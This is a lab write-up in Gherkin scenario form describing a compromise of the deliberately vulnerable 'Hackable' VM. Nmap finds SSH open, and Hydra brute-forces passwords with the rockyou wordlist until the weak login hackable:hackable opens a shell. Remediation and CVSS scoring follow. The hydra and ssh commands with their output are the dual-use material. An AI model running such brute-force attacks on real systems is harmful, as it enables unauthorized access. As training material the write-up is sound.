## Version 1.4.1
## language: en

Feature:
  TOE:
    Hackable Secret Hacker Vulnerable Web Application Server
  Location:
    10.0.0.234:22 TCP
  CWE:
    CWE-0521: Weak Password Requirements:
      https://cwe.mitre.org/data/definitions/521.html
    CWE-0255: Credentials Management Errors:
      https://cwe.mitre.org/data/definitions/255.html
    CWE-0200: Exposure of Sensitive Information to an Unauthorized Actor:
      https://cwe.mitre.org/data/definitions/200.html
  Rule:
    REQ.133: https://fluidattacks.com/web/rules/133/
  Goal:
    Achieve a SSH session to the machine
  Recommendation:
    Enforce the use of strong passwords and usernames

  Background:
  Hacker's software:
    | <Software name>        | <Version>   |
    | Kali GNU/Linux Rolling | 2020.2a     |
    | Nmap                   | 7.80        |
    | Hydra                  | 9.0         |
  TOE information:
    Given I am running a Hackable Secret Hacker VM at
    """
    10.0.0.234
    """
  Scenario: Normal use case
    Given That I am a registered user
    When I enter my Credentials
    Then I am able to connect via SSH

  Scenario: Static detection
    Given I'm aiming to exploit an SSH service
    When I don't have access to files in the VM or a valid know SSH key
    Then I realize it is not possible to make a static exploitation

  Scenario: Dynamic detection
    Given I scan the target machine
    When I scan open ports with
    """
    $ nmap 10.0.0.234
    """
    Then i get the following output:
    """
    Nmap scan report for 10.0.0.234
    Host is up (0.00036s latency).
    Not shown: 992 closed ports
    PORT     STATE SERVICE
    22/tcp   open  ssh
    80/tcp   open  http
    139/tcp  open  netbios-ssn
    443/tcp  open  https
    445/tcp  open  microsoft-ds
    5001/tcp open  commplex-link
    8080/tcp open  http-proxy
    9090/tcp open  zeus-admin
    Nmap done: 1 IP address (1 host up) scanned in 16.64 seconds
    """
    And I notice that the default port for SSH is open
    """
    22/tcp   open  ssh
    """
    Given That the default port for SSH is open
    Then I think that SSH does not have good security enforced
    And That maybe it has weak credentials to log in

  Scenario: Exploitation
    Given The machine with SSH open port
    When I use Hydra with "root" as username, I get the following output
    """
    $ hydra -v -V -l root -P /usr/share/wordlists/rockyou.txt 10.0.0.234 -t 4
    -e nsr ssh
    ...
    [DATA] attacking ssh://10.0.0.234:22/
    [VERBOSE] Resolving addresses ... [VERBOSE] resolving done
    [INFO] Testing if password authentication is supported by ssh://root@10...
    [INFO] Successful, password authentication is supported by ssh://10...
    [ATTEMPT] target 10.0.0.234 - login "root" - pass "root" - 1 of 14344402...
    [ATTEMPT] target 10.0.0.234 - login "root" - pass "" - 2 of 14344402...
    [ATTEMPT] target 10.0.0.234 - login "root" - pass "toor" - 3 of 14344402...
    [ATTEMPT] target 10.0.0.234 - login "root" - pass "123456" - 4 of 143444...
    [ATTEMPT] target 10.0.0.234 - login "root" - pass "12345" - 5 of 1434440...
    [ATTEMPT] target 10.0.0.234 - login "root" - pass "123456789" - 6 of 143...
    [ATTEMPT] target 10.0.0.234 - login "root" - pass "password" - 7 of 1434...
    [ATTEMPT] target 10.0.0.234 - login "root" - pass "iloveyou" - 8 of 1434...
    [ATTEMPT] target 10.0.0.234 - login "root" - pass "princess" - 9 of 1434...
    [ATTEMPT] target 10.0.0.234 - login "root" - pass "1234567" - 10 of 1434...
    [ATTEMPT] target 10.0.0.234 - login "root" - pass "rockyou" - 11 of 1434...
    ...
    """
    Then After a minute I stop the attempt with that user
    When I use Hydra with "admin" as username, I get the following output
    """
    $ hydra -v -V -l admin -P /usr/share/wordlists/rockyou.txt 10.0.0.234 -t 4
    -e nsr ssh
    ...
    [DATA] attacking ssh://10.0.0.234:22/
    [VERBOSE] Resolving addresses ... [VERBOSE] resolving done
    [INFO] Testing if password authentication is supported by ssh://admin@10...
    [INFO] Successful, password authentication is supported by ssh://10.0.0....
    [ATTEMPT] target 10.0.0.234 - login "admin" - pass "admin" - 1 of 14344402
    [ATTEMPT] target 10.0.0.234 - login "admin" - pass "" - 2 of 14344402
    [ATTEMPT] target 10.0.0.234 - login "admin" - pass "nimda" - 3 of 14344402
    [ATTEMPT] target 10.0.0.234 - login "admin" - pass "123456" - 4 of 14344402
    [ATTEMPT] target 10.0.0.234 - login "admin" - pass "12345" - 5 of 14344402
    [ATTEMPT] target 10.0.0.234 - login "admin" - pass "123456789" - 6 of 14...
    [ATTEMPT] target 10.0.0.234 - login "admin" - pass "password" - 7 of 143...
    [ATTEMPT] target 10.0.0.234 - login "admin" - pass "iloveyou" - 8 of 143...
    [ATTEMPT] target 10.0.0.234 - login "admin" - pass "princess" - 9 of 143...
    [ATTEMPT] target 10.0.0.234 - login "admin" - pass "1234567" - 10 of 143...
    [ATTEMPT] target 10.0.0.234 - login "admin" - pass "rockyou" - 11 of 143...
    ....
    """
    Then After a minute I stop the attempt with that user too
    And Think about the name of the machine
    When I use Hydra with "hackable" as username, I get the following output
    """
    [DATA] attacking ssh://10.0.0.234:22/
    [VERBOSE] Resolving addresses ... [VERBOSE] resolving done
    [INFO] Testing if password authentication is supported by ssh://hackable...
    [INFO] Successful, password authentication is supported by ssh://10.0.0...
    [ATTEMPT] target 10.0.0.234 - login "hackable" - pass "hackable" - 1 of...
    [ATTEMPT] target 10.0.0.234 - login "hackable" - pass "" - 2 of 14344402
    [ATTEMPT] target 10.0.0.234 - login "hackable" - pass "elbakcah" - 3 of...
    [ATTEMPT] target 10.0.0.234 - login "hackable" - pass "123456" - 4 of 14...
    [ATTEMPT] target 10.0.0.234 - login "hackable" - pass "12345" - 5 of 143...
    [22][ssh] host: 10.0.0.234   login: hackable   password: hackable
    [STATUS] attack finished for 10.0.0.234 (waiting for children to complete..
    1 of 1 target successfully completed, 1 valid password found
    Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-07-15..
    """
    Then I found the password for that username
    Given The found password
    When I try to establish a session via SSH using the password
    """
    $ ssh -l hackable 10.0.0.234
    The authenticity of host '10.0.0.234 (10.0.0.234)' can't be established.
    ECDSA key fingerprint is SHA256:9jMYhODo....
    Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
    Warning: Permanently added '10.0.0.234' (ECDSA) to the list of known hosts.
    hackable@10.0.0.234's password:

_    _               _           _      _
    | |  | |             | |         | |    | |
    | |__| |  __ _   ___ | | __ __ _ | |__  | |  ___
    |  __  | / _` | / __|| |/ // _` || '_ \ | | / _ \
    | |  | || (_| || (__ |   <| (_| || |_) || ||  __/
    |_|  |_| \__,_| \___||_|\_\\__,_||_.__/ |_| \___|


    *. Power by : Waseem Sajjad
    *. website  : https://secrethackersite.blogspot.com
    *. Username : hackable
    *. Password : hackable
    --------------------------------------------------------

    Last login: Wed Jul 15 16:42:28 2020
    hackable@hackable:~$ whoami
    hackable
    hackable@hackable:~$ pwd
    /home/hackable
    hackable@hackable:~$ cd /
    bin/        cdrom/      etc/        lib/        lost+found/ mnt/
    proc/       run/        snap/       sys/        usr/
    boot/       dev/        home/       lib64/      media/
    opt/        root/       sbin/       srv/        tmp/        var/
    hackable@hackable:~$ cd /
    """
    Then I conclude that i have correctly stablished a SSH session

  Scenario: Remediation
    Given The SSH config in the VM
    When I change the user's passwords to strong ones
    """
    hackable@hackable:~$ passwd
    Changing password for hackable.
    (current) UNIX password:
    Enter new UNIX password:
    Retype new UNIX password:
    passwd: password updated successfully
    """
    Then Finding a password with Hydra or another program is harder
    And the SSH access is more secure

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    8.6/10 (High) - AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L
  Temporal: Attributes that measure the exploit's popularity and fixability
    8.2/10 (High) - E:H/RL:O/RC:C
  Environmental: Unique and relevant attributes to a specific user environment
    8.2/10 (High) - CR:M/IR:L/AR:L

  Scenario: Correlations
    No correlations have been found to this date 2020-07-15
